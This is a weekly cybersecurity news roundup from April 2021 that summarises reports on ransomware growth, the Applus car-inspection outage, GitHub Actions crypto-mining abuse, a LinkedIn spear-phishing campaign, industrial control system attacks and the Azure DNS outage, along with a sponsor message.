This week’s Cyber Security Headlines – Week in Review, April 5-9, 2021, is hosted by Steve Prentice (@stevenprentice) with our guest, Justin Berman (@justinmberman), former CISO, Dropbox

Cyber Security Headlines – Week in Review is live every Thursday at 4pm PT/7pm ET. Join us each week by registering for the open discussion.

Ransomware 2.0 is here

The availability of ransomware-as-a-service is allowing more cybercriminals to become involved in the business, which now includes double extortion, which, according to analysis from F-Secure, has increased drastically in 2020. This has led to an increase in ransomware families, including Ragnar Locker, Doppelpaymer, Clop, Conti, and ChaCha. Key finding in the report include attackers are using Excel formulas, which cannot be blocked, to hide malicious code, Outlook, FaceBook and Office 365 were the most popular brands spoofed in phishing emails, three-quarters of domains used to host phishing pages were web hosting services, and email accounted for over half of all malware infection attempts in 2020, making it the most common method of spreading malware in ransomware attacks.

(CISOMag)

Malware attack is preventing car inspections in eight US states

The attack, which occurred last Tuesday, March 30 on emissions testing company Applus Technologies, disconnected its IT systems, preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin. Applus Technologies cannot provide a time frame for when they will restore service as State governments require them to go through a rigorous mitigation and testing process, which may have a cascade effect with DMV inspections, which may further lead to citations for lapsed inspections.

(Bleeping Computer)

GitHub investigating crypto mining abuses

GitHub is actively investigating a series of attacks against its cloud infrastructure that allowed cybercriminals to implant and abuse the company’s servers for illicit crypto-mining operations. The attacks, which have been going on since the fall of 2020 abused a feature called GitHub Actions, which allows users to automatically execute tasks and workflows once a certain event happens inside one of their GitHub repositories. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original, without needing approval of the original project owner.

(The Record)

Firmware malware on the rise

According to Microsoft’s March 2021 Security Signals report, over 80% of enterprises were victims of at least one firmware attack in the past two years. The survey had responses from 1,000 companies from China, Germany, Japan, the U.K. and the U.S., who reported the majority of security investments were going to security updates, vulnerability scanning and advanced threat protection solutions. The report notes that NIST’s  National Vulnerability Database has seen a five-fold increase in firmware attacks in the last four years. The report found that only 36% of businesses invest in hardware-based memory encryption, 46% are investing in hardware-based kernel protections,while 21% of decision-makers said they were not able to monitor firmware at all. (Security Affairs)

Thanks to our episode sponsor, Sotero


This week we’ve been excited to welcome our new sponsor – Sotero. We’ve told you about their their encryption solutions that keep data encrypted while the data is in use and in motion. This is the breakthrough that many of us have been waiting for. Well, Sotero has just uploaded to our site a technical whitepaper that takes a deep dive into this new encryption technology. You can find it on our homepage, about halfway down. You can also learn more about this new encryption technology at Soterosoft dot com .

LinkedIn spearphishing campaign uses custom decoy job offers

A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The phish generates malicious ZIP archive files that mimic the name of the victims’ job titles taken from their LinkedIn profiles. If a LinkedIn member’s job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position. Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the more_eggs trojan. With the COVID pandemic contributing to job losses, this phish takes advantage of job seekers who are desperate to find employment.

(The Hacker News)

Ransomware attacks increased by 485% in 2020 over 2019

This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: Two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices made up 96% of all detected vulnerabilities, while a 335% surge in Smart TV vulnerabilities occurred compared to 2019. In social engineering, Android was especially heavily targeted, experiencing a 32% growth, specifically in impersonating video conferencing software and COVID-related medical apps. In addition, a 189% year-on-year increase in vulnerabilities in network-attached storage (NAS) devices was observed.

(Infosecurity Magazine)

Industrial Control Systems are becoming a favorite target for threat actors

A new report from Kaspersky confirms that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the more famous examples, the China-linked group RedEcho targeting the Indian power sector and an unidentified cybercriminal attempting to poison a Florida city’s water supply and treatment plant, the report states that the attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.

(CISOMag)

Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDOS

Following up on a story we brought you on Monday, Microsoft has confirmed its April 1 outage was due to an anomalous surge of DNS queries from all over the world that was targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not reveal who was responsible for the attack whose success was unusual for such a large and well-defended target as Azure, but stated, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”

(MSPowerUser.com)

Slack and Discord file sharing used to spread malware

This finding comes from Cisco Talos research, finding this an increasingly common attack vector. Threat actors upload malicious files to the platforms, which are then housed in their CDN and linked for access. These links are then shared on other outside platforms, with the malware served up by Discord or Slack infrastructure. The researchers warned that using legitimate infrastructure generally trusted by other users makes social engineering attacks much easier to pull off. Talos previously identified attackers using Discord to distribute Thanatos ransomware in 2018. -also Google forms for phishing

(Cyberscoop)

Lockdowns saw the rise of wine scammers

A new report by Recorded Future notes that the start of COVID-19 lockdowns saw a rise in wine-related domain registrations as people increasingly turned to virtual happy hours to keep in contact with friends and co-workers, up 2-3 times pre-pandemic levels from April 2020 and continuing through March 2021. The report found malicious domains followed a similar growth, delayed a month with a large spike in May 2020, with a total of 4,389 malicious wine-themed domains identified. Malicious wine-related domains as a percentage of all wine domains registered peaked in June 2020 at 7%.

(Recorded Future)